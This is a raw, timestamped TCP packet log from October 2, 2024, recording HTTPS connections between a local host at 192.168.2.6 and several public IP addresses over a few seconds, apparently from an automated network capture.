                                                                          Oct 2, 2024 00:42:47.596071005 CEST44349725104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:42:47.596124887 CEST49725443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:42:47.596132040 CEST44349725104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:42:47.596146107 CEST44349725104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:42:47.596190929 CEST49725443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:42:47.632011890 CEST44349726216.58.206.36192.168.2.6
                                                                          Oct 2, 2024 00:42:47.640678883 CEST49726443192.168.2.6216.58.206.36
                                                                          Oct 2, 2024 00:42:47.640691042 CEST44349726216.58.206.36192.168.2.6
                                                                          Oct 2, 2024 00:42:47.641695976 CEST44349726216.58.206.36192.168.2.6
                                                                          Oct 2, 2024 00:42:47.641752005 CEST49726443192.168.2.6216.58.206.36
                                                                          Oct 2, 2024 00:42:47.644269943 CEST49726443192.168.2.6216.58.206.36
                                                                          Oct 2, 2024 00:42:47.644326925 CEST44349726216.58.206.36192.168.2.6
                                                                          Oct 2, 2024 00:42:47.648082972 CEST49725443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:42:47.648111105 CEST44349725104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:42:47.693012953 CEST49726443192.168.2.6216.58.206.36
                                                                          Oct 2, 2024 00:42:47.693025112 CEST44349726216.58.206.36192.168.2.6
                                                                          Oct 2, 2024 00:42:47.699093103 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.699527025 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.699578047 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.700170040 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.700965881 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.701045990 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.701201916 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.742100000 CEST49726443192.168.2.6216.58.206.36
                                                                          Oct 2, 2024 00:42:47.742106915 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.742136002 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.767250061 CEST49728443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:47.767277956 CEST44349728184.28.90.27192.168.2.6
                                                                          Oct 2, 2024 00:42:47.767337084 CEST49728443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:47.771195889 CEST49728443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:47.771212101 CEST44349728184.28.90.27192.168.2.6
                                                                          Oct 2, 2024 00:42:47.851346016 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.851413012 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.851445913 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.851480007 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.851505041 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.851527929 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.851541996 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.851548910 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.851582050 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.851815939 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.852552891 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.852585077 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.852612972 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.852638006 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.852672100 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.852719069 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.858146906 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.858217955 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.858236074 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.911441088 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.941636086 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.941715002 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.941776037 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.941787958 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.941814899 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.941865921 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.942332983 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.942387104 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.942415953 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.942460060 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.942476034 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.942532063 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.943406105 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.943454981 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.943696976 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.943710089 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.943886042 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.943916082 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.943945885 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.943945885 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.943958998 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.944016933 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.944031000 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.944078922 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.944812059 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.944885015 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.944912910 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.944948912 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.944962978 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.945014954 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.945764065 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.945818901 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.945877075 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.945890903 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.945909977 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:47.945962906 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.991611004 CEST49727443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:47.991645098 CEST44349727104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:48.061450005 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:48.061531067 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:48.061697960 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:48.061903954 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:48.061928988 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:48.430628061 CEST44349728184.28.90.27192.168.2.6
                                                                          Oct 2, 2024 00:42:48.430716038 CEST49728443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:48.434073925 CEST49728443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:48.434087038 CEST44349728184.28.90.27192.168.2.6
                                                                          Oct 2, 2024 00:42:48.434336901 CEST44349728184.28.90.27192.168.2.6
                                                                          Oct 2, 2024 00:42:48.481697083 CEST49728443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:48.652245998 CEST49728443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:48.695405960 CEST44349728184.28.90.27192.168.2.6
                                                                          Oct 2, 2024 00:42:48.841456890 CEST44349728184.28.90.27192.168.2.6
                                                                          Oct 2, 2024 00:42:48.841638088 CEST49728443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:48.841655016 CEST44349728184.28.90.27192.168.2.6
                                                                          Oct 2, 2024 00:42:48.841662884 CEST49728443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:48.841818094 CEST44349728184.28.90.27192.168.2.6
                                                                          Oct 2, 2024 00:42:48.841847897 CEST44349728184.28.90.27192.168.2.6
                                                                          Oct 2, 2024 00:42:48.841893911 CEST49728443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:48.865932941 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:48.866355896 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:48.866399050 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:48.867531061 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:48.867614031 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:48.867938042 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:48.868036032 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:48.868072033 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:48.879586935 CEST49730443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:48.879621983 CEST44349730184.28.90.27192.168.2.6
                                                                          Oct 2, 2024 00:42:48.879720926 CEST49730443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:48.881737947 CEST49730443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:48.881752968 CEST44349730184.28.90.27192.168.2.6
                                                                          Oct 2, 2024 00:42:48.915338993 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:48.915404081 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:48.963232040 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.024409056 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.024478912 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.024549007 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.024574995 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.024612904 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.024688959 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.024724960 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.025682926 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.025739908 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.025767088 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.029910088 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.029942989 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.029977083 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.030006886 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.030056953 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.030088902 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.054528952 CEST49732443192.168.2.6151.101.2.137
                                                                          Oct 2, 2024 00:42:49.054553032 CEST44349732151.101.2.137192.168.2.6
                                                                          Oct 2, 2024 00:42:49.054625034 CEST49732443192.168.2.6151.101.2.137
                                                                          Oct 2, 2024 00:42:49.055740118 CEST49732443192.168.2.6151.101.2.137
                                                                          Oct 2, 2024 00:42:49.055749893 CEST44349732151.101.2.137192.168.2.6
                                                                          Oct 2, 2024 00:42:49.062809944 CEST49733443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:42:49.062839031 CEST44349733104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:42:49.063070059 CEST49733443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:42:49.063668013 CEST49733443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:42:49.063683033 CEST44349733104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:42:49.070770979 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.070801973 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.111207962 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.111428022 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.111434937 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.111493111 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.111548901 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.111586094 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.112428904 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.112457037 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.112483025 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.112503052 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.112529993 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.112557888 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.113480091 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.113538980 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.113554955 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.114226103 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.114255905 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.114308119 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.114322901 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.114375114 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.115041971 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.115080118 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.115309000 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.115323067 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.115928888 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.116008043 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.116023064 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.116847038 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.116892099 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.116899014 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.116913080 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.116971016 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.117666006 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.129070997 CEST49734443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.129102945 CEST44349734104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.129175901 CEST49734443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.129491091 CEST49734443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.129508018 CEST44349734104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.150212049 CEST49735443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:49.150269032 CEST44349735104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.150398016 CEST49735443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:49.150995970 CEST49735443192.168.2.6104.18.94.41
                                                                          Oct 2, 2024 00:42:49.151027918 CEST44349735104.18.94.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.163763046 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.163806915 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.197751045 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.197837114 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.197901964 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.197983027 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.198014021 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.198040962 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.198049068 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.198061943 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.198096037 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.198734999 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.198743105 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.198811054 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.198834896 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.199551105 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.199582100 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.199615955 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.199640036 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.199671984 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.200495958 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.200562954 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.200578928 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.200634003 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.201252937 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.201332092 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.201333046 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.201349020 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.201385975 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.201406956 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.202086926 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.202147961 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.206564903 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.206609011 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.206648111 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.206648111 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.206665039 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.206692934 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.206700087 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.206700087 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.206723928 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.206736088 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.206758976 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.206762075 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.206809044 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.206820011 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.206871033 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.206895113 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.206960917 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.284501076 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.284567118 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.284579992 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.284648895 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.284673929 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.284682035 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.284706116 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.284723997 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.284748077 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.284848928 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.284898996 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.284914017 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.284964085 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.285135031 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.285188913 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.285228968 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.285284042 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.285624981 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.285700083 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.285732031 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.285773039 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.285792112 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.285804033 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.285831928 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.286160946 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.286216021 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.286227942 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.286282063 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.286340952 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.286344051 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.286358118 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.286391973 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.286402941 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.286402941 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.286428928 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.286446095 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.286458015 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.286492109 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.286503077 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.286659002 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.287084103 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.287142038 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.287153959 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.287177086 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.287230968 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.292630911 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.292678118 CEST44349729104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.292702913 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.292735100 CEST49729443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.314510107 CEST49736443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.314558029 CEST44349736104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.314621925 CEST49736443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.315234900 CEST49736443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.315256119 CEST44349736104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.525589943 CEST44349732151.101.2.137192.168.2.6
                                                                          Oct 2, 2024 00:42:49.527859926 CEST44349733104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:42:49.550457954 CEST44349730184.28.90.27192.168.2.6
                                                                          Oct 2, 2024 00:42:49.550515890 CEST49730443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:49.572787046 CEST49733443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:42:49.572796106 CEST49732443192.168.2.6151.101.2.137
                                                                          Oct 2, 2024 00:42:49.590663910 CEST44349734104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.596188068 CEST49733443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:42:49.596214056 CEST44349733104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:42:49.596430063 CEST49732443192.168.2.6151.101.2.137
                                                                          Oct 2, 2024 00:42:49.596448898 CEST44349732151.101.2.137192.168.2.6
                                                                          Oct 2, 2024 00:42:49.596990108 CEST49734443192.168.2.6104.18.95.41
                                                                          Oct 2, 2024 00:42:49.597017050 CEST44349734104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.597795963 CEST44349732151.101.2.137192.168.2.6
                                                                          Oct 2, 2024 00:42:49.597850084 CEST49732443192.168.2.6151.101.2.137
                                                                          Oct 2, 2024 00:42:49.598202944 CEST44349733104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:42:49.598272085 CEST49733443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:42:49.599239111 CEST44349734104.18.95.41192.168.2.6
                                                                          Oct 2, 2024 00:42:49.599653959 CEST49730443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:49.599670887 CEST44349730184.28.90.27192.168.2.6
                                                                          Oct 2, 2024 00:42:49.599944115 CEST44349730184.28.90.27192.168.2.6
                                                                          Oct 2, 2024 00:42:49.604024887 CEST49730443192.168.2.6184.28.90.27
                                                                          Oct 2, 2024 00:42:49.605482101 CEST49733443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:42:49.605495930 CEST49733443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:42:49.605638027 CEST44349733104.21.55.67192.168.2.6
                                                                          Oct 2, 2024 00:42:49.605650902 CEST49733443192.168.2.6104.21.55.67
                                                                          Oct 2, 2024 00:42:49.605698109 CEST49733443192.168.2.6104.21.55.67
